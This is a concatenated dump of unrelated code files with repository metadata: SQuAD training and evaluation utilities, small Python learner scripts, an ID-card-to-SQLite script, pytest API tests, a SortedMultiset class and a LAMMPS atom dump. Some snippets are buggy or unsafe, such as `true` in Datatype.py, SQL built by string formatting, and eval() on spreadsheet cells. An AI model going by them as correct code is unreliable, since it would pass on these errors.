if self.ckpt_paths.qsize() > self.max_checkpoints:
_, worst_ckpt = self.ckpt_paths.get()
try:
os.remove(worst_ckpt)
self._print('Removed checkpoint: {}'.format(worst_ckpt))
except OSError:
# Avoid crashing if checkpoint has been removed or protected
pass
def load_model(model, checkpoint_path, gpu_ids, return_step=True):
"""Load model parameters from disk.
Args:
model (torch.nn.DataParallel): Load parameters into this model.
checkpoint_path (str): Path to checkpoint to load.
gpu_ids (list): GPU IDs for DataParallel.
return_step (bool): Also return the step at which checkpoint was saved.
Returns:
model (torch.nn.DataParallel): Model loaded from checkpoint.
step (int): Step at which checkpoint was saved. Only if `return_step`.
"""
device = 'cuda:{}'.format(gpu_ids[0]) if gpu_ids else 'cpu'
ckpt_dict = torch.load(checkpoint_path, map_location=device)
# Build model, load parameters
model.load_state_dict(ckpt_dict['model_state'])
if return_step:
step = ckpt_dict['step']
return model, step
return model
def get_available_devices():
"""Get IDs of all available GPUs.
Returns:
device (torch.device): Main device (GPU 0 or CPU).
gpu_ids (list): List of IDs of all GPUs that are available.
"""
gpu_ids = []
if torch.cuda.is_available():
gpu_ids += [gpu_id for gpu_id in range(torch.cuda.device_count())]
device = torch.device('cuda:{}'.format(gpu_ids[0]))
torch.cuda.set_device(device)
else:
device = torch.device('cpu')
return device, gpu_ids
def masked_softmax(logits, mask, dim=-1, log_softmax=False):
"""Take the softmax of `logits` over given dimension, and set
entries to 0 wherever `mask` is 0.
Args:
logits (torch.Tensor): Inputs to the softmax function.
mask (torch.Tensor): Same shape as `logits`, with 0 indicating
positions that should be assigned 0 probability in the output.
dim (int): Dimension over which to take softmax.
log_softmax (bool): Take log-softmax rather than regular softmax.
E.g., some PyTorch functions such as `F.nll_loss` expect log-softmax.
Returns:
probs (torch.Tensor): Result of taking masked softmax over the logits.
"""
mask = mask.type(torch.float32)
masked_logits = mask * logits + (1 - mask) * -1e30
softmax_fn = F.log_softmax if log_softmax else F.softmax
probs = softmax_fn(masked_logits, dim)
return probs
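# Tiny worked example (added): with logits = [1., 2., 3.] and mask = [1, 1, 0],
# the masked logits become [1., 2., -1e30], so the third position receives
# essentially zero probability and the softmax renormalizes over the first two.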
def visualize(tbx, pred_dict, eval_path, step, split, num_visuals):
"""Visualize text examples to TensorBoard.
Args:
tbx (tensorboardX.SummaryWriter): Summary writer.
pred_dict (dict): dict of predictions of the form id -> pred.
eval_path (str): Path to eval JSON file.
step (int): Number of examples seen so far during training.
split (str): Name of data split being visualized.
num_visuals (int): Number of visuals to select at random from preds.
"""
if num_visuals <= 0:
return
if num_visuals > len(pred_dict):
num_visuals = len(pred_dict)
visual_ids = np.random.choice(list(pred_dict), size=num_visuals, replace=False)
with open(eval_path, 'r') as eval_file:
eval_dict = json.load(eval_file)
for i, id_ in enumerate(visual_ids):
pred = pred_dict[id_] or 'N/A'
example = eval_dict[str(id_)]
question = example['question']
context = example['context']
answers = example['answers']
gold = answers[0] if answers else 'N/A'
tbl_fmt = ('- **Question:** {}\n'
+ '- **Context:** {}\n'
+ '- **Answer:** {}\n'
+ '- **Prediction:** {}')
tbx.add_text(tag='{}/{}_of_{}'.format(split, i + 1, num_visuals),
text_string=tbl_fmt.format(question, context, gold, pred),
global_step=step)
def save_preds(preds, save_dir, file_name='predictions.csv'):
"""Save predictions `preds` to a CSV file named `file_name` in `save_dir`.
Args:
preds (list): List of predictions each of the form (id, start, end),
where id is an example ID, and start/end are indices in the context.
save_dir (str): Directory in which to save the predictions file.
file_name (str): File name for the CSV file.
Returns:
save_path (str): Path where CSV file was saved.
"""
# Validate format
if (not isinstance(preds, list)
or any(not isinstance(p, tuple) or len(p) != 3 for p in preds)):
raise ValueError('preds must be a list of tuples (id, start, end)')
# Make sure predictions are sorted by ID
preds = sorted(preds, key=lambda p: p[0])
# Save to a CSV file
save_path = os.path.join(save_dir, file_name)
np.savetxt(save_path, np.array(preds), delimiter=',', fmt='%d')
return save_path
def get_save_dir(base_dir, name, training, id_max=100):
"""Get a unique save directory by appending the smallest positive integer
`id < id_max` that is not already taken (i.e., no dir exists with that id).
Args:
base_dir (str): Base directory in which to make save directories.
name (str): Name to identify this training run. Need not be unique.
training (bool): Save dir. is for training (determines subdirectory).
id_max (int): Maximum ID number before raising an exception.
Returns:
save_dir (str): Path to a new directory with a unique name.
"""
for uid in range(1, id_max):
subdir = 'train' if training else 'test'
save_dir = os.path.join(base_dir, subdir, '{}-{:02d}'.format(name, uid))
if not os.path.exists(save_dir):
os.makedirs(save_dir)
return save_dir
raise RuntimeError('Too many save directories created with the same name. \
Delete old save directories or use another name.')
def get_logger(log_dir, name):
"""Get a `logging.Logger` instance that prints to the console
and an auxiliary file.
Args:
log_dir (str): Directory in which to create the log file.
name (str): Name to identify the logs.
Returns:
logger (logging.Logger): Logger instance for logging events.
"""
class StreamHandlerWithTQDM(logging.Handler):
"""Let `logging` print without breaking `tqdm` progress bars.
See Also:
> https://stackoverflow.com/questions/38543506
"""
def emit(self, record):
try:
msg = self.format(record)
tqdm.tqdm.write(msg)
self.flush()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
# Create logger
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
# Log everything (i.e., DEBUG level and above) to a file
log_path = os.path.join(log_dir, 'log.txt')
file_handler = logging.FileHandler(log_path)
file_handler.setLevel(logging.DEBUG)
# Log everything except DEBUG level (i.e., INFO level and above) to console
console_handler = StreamHandlerWithTQDM()
console_handler.setLevel(logging.INFO)
# Create format for the logs
file_formatter = logging.Formatter('[%(asctime)s] %(message)s',
datefmt='%m.%d.%y %H:%M:%S')
file_handler.setFormatter(file_formatter)
console_formatter = logging.Formatter('[%(asctime)s] %(message)s',
datefmt='%m.%d.%y %H:%M:%S')
console_handler.setFormatter(console_formatter)
# add the handlers to the logger
logger.addHandler(file_handler)
logger.addHandler(console_handler)
return logger
def torch_from_json(path, dtype=torch.float32):
"""Load a PyTorch Tensor from a JSON file.
Args:
path (str): Path to the JSON file to load.
dtype (torch.dtype): Data type of loaded array.
Returns:
tensor (torch.Tensor): Tensor loaded from JSON file.
"""
with open(path, 'r') as fh:
array = np.array(json.load(fh))
tensor = torch.from_numpy(array).type(dtype)
return tensor
def discretize(p_start, p_end, max_len=15, no_answer=False):
"""Discretize soft predictions to get start and end indices.
Choose the pair `(i, j)` of indices that maximizes `p1[i] * p2[j]`
subject to `i <= j` and `j - i + 1 <= max_len`.
Args:
p_start (torch.Tensor): Soft predictions for start index.
Shape (batch_size, context_len).
p_end (torch.Tensor): Soft predictions for end index.
Shape (batch_size, context_len).
max_len (int): Maximum length of the discretized prediction.
I.e., enforce that `preds[i, 1] - preds[i, 0] + 1 <= max_len`.
no_answer (bool): Treat 0-index as the no-answer prediction. Consider
a prediction no-answer if `preds[0, 0] * preds[0, 1]` is greater
than the probability assigned to the max-probability span.
Returns:
start_idxs (torch.Tensor): Hard predictions for start index.
Shape (batch_size,)
end_idxs (torch.Tensor): Hard predictions for end index.
Shape (batch_size,)
"""
if p_start.min() < 0 or p_start.max() > 1 \
or p_end.min() < 0 or p_end.max() > 1:
raise ValueError('Expected p_start and p_end to have values in [0, 1]')
# Compute pairwise probabilities
p_start = p_start.unsqueeze(dim=2)
p_end = p_end.unsqueeze(dim=1)
p_joint = torch.matmul(p_start, p_end) # (batch_size, c_len, c_len)
# Restrict to pairs (i, j) such that i <= j <= i + max_len - 1
c_len, device = p_start.size(1), p_start.device
is_legal_pair = torch.triu(torch.ones((c_len, c_len), device=device))
is_legal_pair -= torch.triu(torch.ones((c_len, c_len), device=device),
diagonal=max_len)
if no_answer:
# Index 0 is no-answer
p_no_answer = p_joint[:, 0, 0].clone()
is_legal_pair[0, :] = 0
is_legal_pair[:, 0] = 0
else:
p_no_answer = None
p_joint *= is_legal_pair
# Take pair (i, j) that maximizes p_joint
max_in_row, _ = torch.max(p_joint, dim=2)
max_in_col, _ = torch.max(p_joint, dim=1)
start_idxs = torch.argmax(max_in_row, dim=-1)
end_idxs = torch.argmax(max_in_col, dim=-1)
if no_answer:
# Predict no-answer whenever p_no_answer > max_prob
max_prob, _ = torch.max(max_in_col, dim=-1)
start_idxs[p_no_answer > max_prob] = 0
end_idxs[p_no_answer > max_prob] = 0
return start_idxs, end_idxs
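# Illustrative call (added; tensors are invented): p_start and p_end are each
# of shape (batch_size, c_len) with values in [0, 1], e.g. softmax outputs:
#
#   starts, ends = discretize(p_start, p_end, max_len=15, no_answer=True)
#
# With no_answer=True, index 0 acts as the no-answer token, and a prediction
# of (0, 0) means the model predicts "no answer".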
def convert_tokens(eval_dict, qa_id, y_start_list, y_end_list, no_answer):
"""Convert predictions to tokens from the context.
Args:
eval_dict (dict): Dictionary with eval info for the dataset. This is
used to perform the mapping from IDs and indices to actual text.
qa_id (int): List of QA example IDs.
y_start_list (list): List of start predictions.
y_end_list (list): List of end predictions.
no_answer (bool): Questions can have no answer. E.g., SQuAD 2.0.
Returns:
pred_dict (dict): Dictionary index IDs -> predicted answer text.
sub_dict (dict): Dictionary UUIDs -> predicted answer text (submission).
"""
pred_dict = {}
sub_dict = {}
for qid, y_start, y_end in zip(qa_id, y_start_list, y_end_list):
context = eval_dict[str(qid)]["context"]
spans = eval_dict[str(qid)]["spans"]
uuid = eval_dict[str(qid)]["uuid"]
if no_answer and (y_start == 0 or y_end == 0):
pred_dict[str(qid)] = ''
sub_dict[uuid] = ''
else:
if no_answer:
y_start, y_end = y_start - 1, y_end - 1
start_idx = spans[y_start][0]
end_idx = spans[y_end][1]
pred_dict[str(qid)] = context[start_idx: end_idx]
sub_dict[uuid] = context[start_idx: end_idx]
return pred_dict, sub_dict
def metric_max_over_ground_truths(metric_fn, prediction, ground_truths):
if not ground_truths:
return metric_fn(prediction, '')
scores_for_ground_truths = []
for ground_truth in ground_truths:
score = metric_fn(prediction, ground_truth)
scores_for_ground_truths.append(score)
return max(scores_for_ground_truths)
def eval_dicts(gold_dict, pred_dict, no_answer):
avna = f1 = em = total = 0
for key, value in pred_dict.items():
total += 1
ground_truths = gold_dict[key]['answers']
prediction = value
em += metric_max_over_ground_truths(compute_em, prediction, ground_truths)
f1 += metric_max_over_ground_truths(compute_f1, prediction, ground_truths)
if no_answer:
avna += compute_avna(prediction, ground_truths)
eval_dict = {'EM': 100. * em / total,
'F1': 100. * f1 / total}
if no_answer:
eval_dict['AvNA'] = 100. * avna / total
return eval_dict
def compute_avna(prediction, ground_truths):
"""Compute answer vs. no-answer accuracy."""
return float(bool(prediction) == bool(ground_truths))
# All methods below this line are from the official SQuAD 2.0 eval script
# https://worksheets.codalab.org/rest/bundles/0x6b567e1cf2e041ec80d7098f031c5c9e/contents/blob/
def normalize_answer(s):
"""Convert to lowercase and remove punctuation, articles and extra whitespace."""
def remove_articles(text):
regex = re.compile(r'\b(a|an|the)\b', re.UNICODE)
return re.sub(regex, ' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return ''.join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def get_tokens(s):
if not s:
return []
return normalize_answer(s).split()
def compute_em(a_gold, a_pred):
return int(normalize_answer(a_gold) == normalize_answer(a_pred))
def compute_f1(a_gold, a_pred):
gold_toks = get_tokens(a_gold)
pred_toks = get_tokens(a_pred)
common = Counter(gold_toks) & Counter(pred_toks)
num_same = sum(common.values())
if len(gold_toks) == 0 or len(pred_toks) == 0:
# If either is no-answer, then F1 is 1 if they agree, 0 otherwise
return int(gold_toks == pred_toks)
if num_same == 0:
return 0
precision = 1.0 * num_same / len(pred_toks)
recall = 1.0 * num_same / len(gold_toks)
f1 = (2 * precision * recall) / (precision + recall)
return f1
| [
"[email protected]"
] | |
06fd170031d6d6565c42dd89088f4689b1a53e92 | c5e92c7d4adb261b891ce0994556c8873e94216f | /kdk.py | a3c973a88566ac804ee140f5a7ae21107f3feaf4 | [] | no_license | kamrudeen007/guvi | b4b8faadfaad381be3bb2c2b8b175cfa2ad1d072 | 8c5abaca6510b996b0a307f1a0d9d366ab314fed | refs/heads/master | 2020-04-21T01:18:55.598550 | 2019-02-05T10:09:21 | 2019-02-05T10:09:21 | 169,220,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | num = int(input("Enter any number: "))
flag = num%2
if flag == 0:
print(num, "is an even number")
elif flag == 1:
print(num, "is an odd number")
| [
"[email protected]"
] | |
96c733a9b746b27413f837bde6c7dce363b7961c | 168bc919d9f03749d01cb3089a358c2ea7a928ea | /Create_sql.py | 57de72cc90c0ae8420dc86f786431a3543a6230f | [] | no_license | tacha-chang/ce63-46 | 175294f6f7fd6584aec1d1285d73028f0b2ed02e | 8fc0551104f986dd9058bb2e968469b2f1325f82 | refs/heads/master | 2023-03-19T22:27:59.086034 | 2021-03-18T23:54:23 | 2021-03-18T23:54:23 | 296,383,388 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,942 | py | import sqlite3
import shutil
from Card_reading import reader_card
data = reader_card()
def create_user_officer(file_id): #move office
x = file_id[2]
# print(x[0])
print(x[1:18]) #ID_card
# 6 gender (7 8)name
#print('บ้านเลขที่ ' +x[14] +' ' + x[15]+' ' + x[16]+' ' + x[17]+' ' + x[18]+' ' + x[19]+' ' + x[20]+' ' + x[21]) #address
name_file = x[1:18]
Name_USER = file_id[7]+' '+file_id[8]
GENDER = file_id[6]
# address = x[14] +' ' + x[15]+' ' + x[16]+' ' + x[17]+' ' + x[18]+' ' + x[19]+' ' + x[20]+' ' + x[21]
address = file_id[15]
Office = "KMITL" #สมมุติ
file_name = name_file+'.db'
print(file_name)
conn = sqlite3.connect(file_name)
cursor = conn.cursor()
print("create database 0f " + file_name)
# conn.execute('''CREATE TABLE USER
# (ID INT PRIMARY KEY NOT NULL,
# GENDER TEXT NOT NULL,
# NAME TEXT NOT NULL,
# ADRESS TEXT NOT NULL,
# OFFICE TEXT NOT NULL);''')
sqlite_insert_with_param = """INSERT INTO USER
(ID, GENDER, NAME, ADRESS, OFFICE)
VALUES (?, ?, ?, ?, ?);"""
    data_tuple = (name_file, GENDER, Name_USER, address, Office)  # order matches (ID, GENDER, NAME, ADRESS, OFFICE)
    print("successfully created")
# conn.execute("INSERT INTO USER VALUES (1, x[1],x[1],x[1],x[1])")
cursor.execute(sqlite_insert_with_param, data_tuple)
conn.commit()
conn.close()
# except sqlite3.Error as error:
# print("Failed to insert Python variable into sqlite table", error)
# finally:
# if conn:
# conn.close()
# print("The SQLite connection is closed")
create_user_officer(data)
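# Hedged verification sketch (added; not in the original script): reads back the
# USER row to confirm the parameterized INSERT stored each field in the declared
# column order. The helper name show_user is hypothetical.
def show_user(db_file):
    conn = sqlite3.connect(db_file)
    try:
        for row in conn.execute("SELECT ID, GENDER, NAME, ADRESS, OFFICE FROM USER"):
            print(row)  # tuple mirrors the INSERT's column order
    finally:
        conn.close()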
| [
"[email protected]"
] | |
124d77348f3d3ea06d36c0de306ca45e624bbd99 | fb1e94f4b51ab342a81be7c38e7c09bf7d4a94fc | /apicode/Pytest0_case/test_07_article.py | d5dbef686fd1b50f7562cf54d137efc605990d1b | [] | no_license | HOHO-00/test_00 | cc1233b0809c171d51c2633fa7d886bea5a657d3 | 21fb066d0c1bac661af54e698e990beb3fbb1a2f | refs/heads/master | 2023-06-22T03:59:43.625128 | 2021-07-23T00:51:50 | 2021-07-23T00:51:50 | 292,587,194 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,867 | py | """
Test cases for the article-related APIs
"""
import pytest
import requests
import os, sys
sys.path.append(os.getcwd())
from utils.dbtools import query
from utils.filetools import read_file
from utils.filetools import write_file
from utils.exceltools import read_excel
datas = read_excel("data/data.xlsx", "文章")
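# Added note (inferred from the index usage below, not from the workbook itself):
# each row of the "文章" sheet appears to be laid out positionally as
#   row[2] = request URL, row[3] = headers dict literal, row[4] = payload dict literal,
#   row[5] = expected HTTP status code, row[6] = expected "status" field in the response body.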
# Get article details
def test_01_article_details():
url = datas[0][2]
header = eval(datas[0][3])
res = requests.get(url=url,headers=header)
assert res.status_code == datas[0][5]
assert res.json()["status"] == datas[0][6]
# Get the article comment list
def test_02_article_comments():
url = datas[1][2]
header = eval(datas[1][3])
data = eval(datas[1][4])
res = requests.post(url=url,headers=header,json=data)
assert res.status_code == datas[1][5]
assert res.json()["status"] == datas[1][6]
# Add a new article
def test_03_article_add():
url = datas[2][2]
header = eval(datas[2][3])
data = eval(datas[2][4])
res = requests.post(url=url,headers=header,json=data)
# print(res.text)
assert res.status_code == datas[2][5]
assert res.json()["status"] == datas[2][6]
articleid = res.json()["data"]["articleid"]
write_file('./tmp/article_id.txt',str(articleid))
sql = "select * from t_article where id = {}".format(read_file("./tmp/article_id.txt"))
assert len(query(sql)) != 0
# Update an article
def test_04_article_update():
url = datas[3][2]
"""
payload={}
files=[('upload',('ho.png',open('C:/users/jssy/Pictures/ho.png','rb'),'image/png'))]
"""
header = eval(datas[3][3])
data = eval(datas[3][4])
res = requests.post(url=url,headers=header,json=data) # res = requests.post(url=url, json=data, headers=header,data=payload)
# print(res.text)
assert res.status_code == datas[3][5]
assert res.json()["status"] == datas[3][6]
title = eval(datas[3][4])["title"]
# sql = "select * from t_article where id = {} and title = '{}'"
# sql = "select * from t_article where id = {} and title = '为什么要学习测试123'".format(read_file("./tmp/article_id.txt"))
sql = "select * from t_article where id = {} and title = '{}'".format(read_file("./tmp/article_id.txt"),title)
# r = query(sql)
# assert len(r) != 0
assert len(query(sql)) != 0
# Delete an article
def test_05_article_delete():
url = datas[4][2]
header = eval(datas[4][3])
data = eval(datas[4][4])
res = requests.post(url=url,headers=header,json=data)
# print(res.text)
    assert res.status_code == datas[4][5]
    assert res.json()["status"] == datas[4][6]
sql = "select * from t_article where id = {} and status = '1'".format(read_file("./tmp/article_id.txt")) # status:0正常;1删除;2禁用
assert len(query(sql)) != 0 | [
"[email protected]"
] | |
8edaa67fda3c2d8e1a359fba81e6985b7270aa14 | 8a48adfaca1854854c79b7fbe1e60c67931a2cfb | /Datatype.py | 5393aaceed7bf53887c91a4fc2175a2713bbcdff | [] | no_license | karolcajo/Tarea-5-Ejemplos | 14cb049a402ea572a30b94d916037741eb18e8df | 5b25a00fb4c9532ac1e0040b26e7bdd038f77703 | refs/heads/main | 2022-12-24T20:47:30.941510 | 2020-10-11T15:32:05 | 2020-10-11T15:32:05 | 302,953,183 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 422 | py | # String
print("Hello World")
print("Hello world")
print("""Hello World""")
print("Bye" + "World")
# Integer
print(30)
# Float
print(30.5)
# Boolean
True
False
# List
[10, 20, 30, 55]
["hello","bye","adios"]
[10, "hello", true, 10.1]
[]
# Tuples
(10, 20, 30, 55)
()
# Dictionaries
print(type({"nombredelapersona": "Ryan",
            "apellido": "Ray",
            "apodo": "Fazt"
            }))
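# Added sketch (illustrative): type() reports the class of any literal above, e.g.
# print(type(30))        # <class 'int'>
# print(type([10, 20]))  # <class 'list'>
# NoneType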
None | [
"[email protected]"
] | |
4be0a9347751505cc966aaaae4aa8a00df3626f7 | f13acd0d707ea9ab0d2f2f010717b35adcee142f | /AtCoder_Virtual_Contest/macle_20220825/c/main.py | 02c948ca2212d942ef5f1445c169292d56933fb5 | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | KATO-Hiro/AtCoder | 126b9fe89fa3a7cffcbd1c29d42394e7d02fa7c7 | bf43320bc1af606bfbd23c610b3432cddd1806b9 | refs/heads/master | 2023-08-18T20:06:42.876863 | 2023-08-17T23:45:21 | 2023-08-17T23:45:21 | 121,067,516 | 4 | 0 | CC0-1.0 | 2023-09-14T21:59:38 | 2018-02-11T00:32:45 | Python | UTF-8 | Python | false | false | 5,236 | py | # -*- coding: utf-8 -*-
import math
from bisect import bisect_left, bisect_right, insort
from typing import Generic, Iterable, Iterator, TypeVar, Union, List
T = TypeVar('T')
class SortedMultiset(Generic[T]):
"""Sorted multi set (set) in C++.
See:
https://qiita.com/tatyam/items/492c70ac4c955c055602
https://github.com/tatyam-prime/SortedSet/blob/main/SortedMultiset.py
"""
BUCKET_RATIO = 50
REBUILD_RATIO = 170
def _build(self, a=None) -> None:
"Evenly divide `a` into buckets."
if a is None:
a = list(self)
size = self.size = len(a)
bucket_size = int(math.ceil(math.sqrt(size / self.BUCKET_RATIO)))
self.a = [a[size * i // bucket_size: size * (i + 1) // bucket_size] for i in range(bucket_size)]
def __init__(self, a: Iterable[T] = []) -> None:
"Make a new SortedMultiset from iterable. / O(N) if sorted / O(N log N)"
a = list(a)
if not all(a[i] <= a[i + 1] for i in range(len(a) - 1)): # type: ignore
a = sorted(a) # type: ignore
self._build(a)
def __iter__(self) -> Iterator[T]:
for i in self.a:
for j in i:
yield j # type: ignore
def __reversed__(self) -> Iterator[T]:
for i in reversed(self.a):
for j in reversed(i):
yield j
def __len__(self) -> int:
return self.size
def __repr__(self) -> str:
return "SortedMultiset" + str(self.a)
def __str__(self) -> str:
s = str(list(self))
return "{" + s[1: len(s) - 1] + "}"
def _find_bucket(self, x: T) -> List[T]:
"Find the bucket which should contain x. self must not be empty."
for a in self.a:
if x <= a[-1]: # type: ignore
return a
return a # type: ignore
def __contains__(self, x: T) -> bool:
if self.size == 0:
return False
a = self._find_bucket(x)
i = bisect_left(a, x) # type: ignore
return i != len(a) and a[i] == x
def count(self, x: T) -> int:
"Count the number of x."
return self.index_right(x) - self.index(x)
def add(self, x: T) -> None:
"Add an element. / O(√N)"
if self.size == 0:
self.a = [[x]]
self.size = 1
return
a = self._find_bucket(x)
insort(a, x) # type: ignore
self.size += 1
if len(a) > len(self.a) * self.REBUILD_RATIO:
self._build()
def discard(self, x: T) -> bool:
"Remove an element and return True if removed. / O(√N)"
if self.size == 0:
return False
a = self._find_bucket(x)
i = bisect_left(a, x) # type: ignore
if i == len(a) or a[i] != x:
return False
a.pop(i)
self.size -= 1
if len(a) == 0:
self._build()
return True
def lt(self, x: T) -> Union[T, None]:
"Find the largest element < x, or None if it doesn't exist."
for a in reversed(self.a):
if a[0] < x: # type: ignore
return a[bisect_left(a, x) - 1] # type: ignore
return None
def le(self, x: T) -> Union[T, None]:
"Find the largest element <= x, or None if it doesn't exist."
for a in reversed(self.a):
if a[0] <= x: # type: ignore
return a[bisect_right(a, x) - 1] # type: ignore
return None
def gt(self, x: T) -> Union[T, None]:
"Find the smallest element > x, or None if it doesn't exist."
for a in self.a:
if a[-1] > x: # type: ignore
return a[bisect_right(a, x)] # type: ignore
return None
def ge(self, x: T) -> Union[T, None]:
"Find the smallest element >= x, or None if it doesn't exist."
for a in self.a:
if a[-1] >= x: # type: ignore
return a[bisect_left(a, x)] # type: ignore
return None
def __getitem__(self, x: int) -> T:
"Return the x-th element, or IndexError if it doesn't exist."
if x < 0:
x += self.size
if x < 0:
raise IndexError
for a in self.a:
if x < len(a):
return a[x] # type: ignore
x -= len(a)
raise IndexError
def index(self, x: T) -> int:
"Count the number of elements < x."
ans = 0
for a in self.a:
if a[-1] >= x: # type: ignore
return ans + bisect_left(a, x) # type: ignore
ans += len(a)
return ans
def index_right(self, x: T) -> int:
"Count the number of elements <= x."
ans = 0
for a in self.a:
if a[-1] > x: # type: ignore
return ans + bisect_right(a, x) # type: ignore
ans += len(a)
return ans
def main():
import sys
input = sys.stdin.readline
l, q = map(int, input().split())
s = SortedMultiset([0, l])
for i in range(q):
ci, xi = map(int, input().split())
if ci == 1:
s.add(xi)
else:
print(s.gt(xi) - s.lt(xi))
if __name__ == "__main__":
main()
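# Added usage sketch (illustrative, not part of the original submission):
# exercises the SortedMultiset operations that main() relies on.
def _demo():
    s = SortedMultiset([3, 1, 4, 1, 5])   # stored sorted: 1 1 3 4 5
    s.add(2)                              # O(sqrt(N)) insert
    s.discard(4)                          # O(sqrt(N)) removal
    print(s.lt(3), s.gt(3))               # 2 5
    print(s.index(3), s.count(1))         # 3 2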
| [
"[email protected]"
] | |
74c3487b1ce6284d456f24c7a822e7f5b042c1b0 | 649bd422025e421d86025743eac324c9b882a2e8 | /exam/1_three-dimensional_atomic_system/dump/phasetrans/temp83_0.py | 55e6471489d774a44032f55978e0c9af8a653f9c | [] | no_license | scheuclu/atom_class | 36ddee1f6a5995872e858add151c5942c109847c | 0c9a8c63d9b38898c1869fe8983126cef17662cd | refs/heads/master | 2021-01-21T10:52:28.448221 | 2017-03-07T23:04:41 | 2017-03-07T23:04:41 | 83,489,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68,894 | py | ITEM: TIMESTEP
0
ITEM: NUMBER OF ATOMS
2048
ITEM: BOX BOUNDS pp pp pp
3.3480991349454570e-01 4.6865190086497961e+01
3.3480991349454570e-01 4.6865190086497961e+01
3.3480991349454570e-01 4.6865190086497961e+01
ITEM: ATOMS id type xs ys zs
8 1 0.130808 0.0685954 0.067749
35 1 0.0615812 0.131941 0.0620756
130 1 0.0673745 0.0640743 0.11748
165 1 0.131142 0.128914 0.121465
2 1 0.0695213 0.0667569 0.00435885
37 1 0.125561 0.133088 0.00372516
1 1 0.00214951 0.00360363 0.00137352
129 1 0.00721661 0.000399364 0.132507
133 1 0.12787 0.0091779 0.125678
3 1 0.0615281 0.00283245 0.0560259
33 1 0.00628241 0.122947 0.00199967
41 1 0.255074 0.120998 0.00247506
12 1 0.256702 0.0621165 0.0635116
39 1 0.18849 0.128713 0.0601789
43 1 0.314491 0.133976 0.0600459
134 1 0.190575 0.0721728 0.127107
138 1 0.312259 0.0636323 0.128498
169 1 0.249922 0.133413 0.117835
7 1 0.186992 0.00728301 0.0645151
137 1 0.250507 0.00351034 0.121993
6 1 0.189619 0.0663561 0.00165912
16 1 0.369832 0.065535 0.0613228
47 1 0.437339 0.134886 0.0575771
142 1 0.43311 0.0693917 0.124919
173 1 0.374931 0.129585 0.123094
145 1 0.49597 0.00509139 0.121231
20 1 0.490534 0.060222 0.0599609
15 1 0.433715 0.00178399 0.059005
14 1 0.429334 0.0650988 0.00372852
49 1 0.494926 0.120136 0.000961326
177 1 0.500933 0.127737 0.120011
24 1 0.618947 0.0656048 0.0659352
51 1 0.564982 0.123398 0.0535858
146 1 0.556652 0.0696211 0.120498
181 1 0.623493 0.127887 0.119896
149 1 0.621413 0.00203271 0.126088
19 1 0.55821 0.00671903 0.065014
28 1 0.744291 0.051325 0.0639339
55 1 0.682399 0.124839 0.0582936
59 1 0.812581 0.119231 0.0638001
150 1 0.688481 0.0611819 0.121978
154 1 0.799091 0.0663457 0.132579
185 1 0.746599 0.127579 0.125456
22 1 0.67589 0.0536424 0.00674597
57 1 0.74755 0.118531 0.00724268
26 1 0.819197 0.0635787 0.00609031
4 1 0.996363 0.0584481 0.0633073
161 1 0.996703 0.121693 0.122247
32 1 0.878943 0.0628986 0.0636405
63 1 0.931276 0.130829 0.0663827
158 1 0.933467 0.0579956 0.122245
189 1 0.877272 0.121874 0.130926
61 1 0.867437 0.135243 0.00464827
30 1 0.938778 0.0567226 0.000580732
40 1 0.125694 0.194609 0.0654106
67 1 0.0543099 0.249068 0.0724686
72 1 0.12366 0.312019 0.0666992
162 1 0.0688229 0.188212 0.127454
194 1 0.0574666 0.306123 0.127401
197 1 0.121783 0.247949 0.123449
36 1 0.000173399 0.183002 0.069021
69 1 0.113044 0.250965 0.00828519
34 1 0.06401 0.190304 0.00124161
44 1 0.242643 0.193217 0.0630084
71 1 0.186982 0.25364 0.0596591
75 1 0.306053 0.243772 0.0614634
76 1 0.254313 0.303096 0.0699722
166 1 0.187876 0.188445 0.125002
170 1 0.316137 0.184086 0.123622
198 1 0.189632 0.311759 0.129538
201 1 0.253681 0.249862 0.130996
202 1 0.321845 0.320619 0.13367
74 1 0.313776 0.313242 0.0055655
73 1 0.248241 0.25639 0.000483841
48 1 0.383878 0.190133 0.0542299
79 1 0.44665 0.247464 0.0529615
80 1 0.372873 0.311057 0.0600798
174 1 0.435719 0.19442 0.120077
205 1 0.374042 0.248904 0.115022
206 1 0.444925 0.299641 0.11928
84 1 0.504138 0.308064 0.0623404
52 1 0.50307 0.182235 0.0613968
209 1 0.5133 0.251198 0.12277
56 1 0.622931 0.183591 0.0613469
83 1 0.561503 0.242679 0.0566626
88 1 0.618381 0.316386 0.0585294
178 1 0.566574 0.184471 0.121372
210 1 0.568165 0.312496 0.125149
213 1 0.626406 0.250788 0.121887
60 1 0.748808 0.183019 0.0567971
87 1 0.685999 0.253104 0.0553365
91 1 0.804547 0.247052 0.0560679
92 1 0.747832 0.318432 0.0616899
182 1 0.69039 0.185775 0.117104
186 1 0.808283 0.182532 0.119399
214 1 0.68067 0.313849 0.121539
217 1 0.746881 0.247696 0.114411
218 1 0.811768 0.314322 0.114754
54 1 0.685855 0.18377 0.00494905
58 1 0.802232 0.184376 0.00288401
62 1 0.9406 0.191793 0.006952
93 1 0.873021 0.243789 0.00528555
193 1 0.999166 0.243232 0.135248
68 1 0.999754 0.30919 0.0644451
64 1 0.870868 0.18797 0.0687111
95 1 0.94118 0.253044 0.0627872
96 1 0.871386 0.31454 0.0528561
190 1 0.941147 0.187395 0.126725
221 1 0.881809 0.247341 0.122331
222 1 0.938404 0.310315 0.132704
94 1 0.94391 0.313816 0.00201044
1153 1 0.000742689 0.497468 0.119691
1027 1 0.0628977 0.491051 0.0670263
101 1 0.130759 0.379155 0.00167892
99 1 0.0673753 0.3724 0.0642353
104 1 0.132739 0.432169 0.06254
226 1 0.0654797 0.435363 0.125966
229 1 0.128378 0.36903 0.125893
1157 1 0.124968 0.497623 0.116302
97 1 1.37735e-05 0.371807 0.00414642
105 1 0.256089 0.371076 0.0117414
103 1 0.190901 0.369792 0.062353
107 1 0.317192 0.372 0.0646675
108 1 0.256967 0.440648 0.0749559
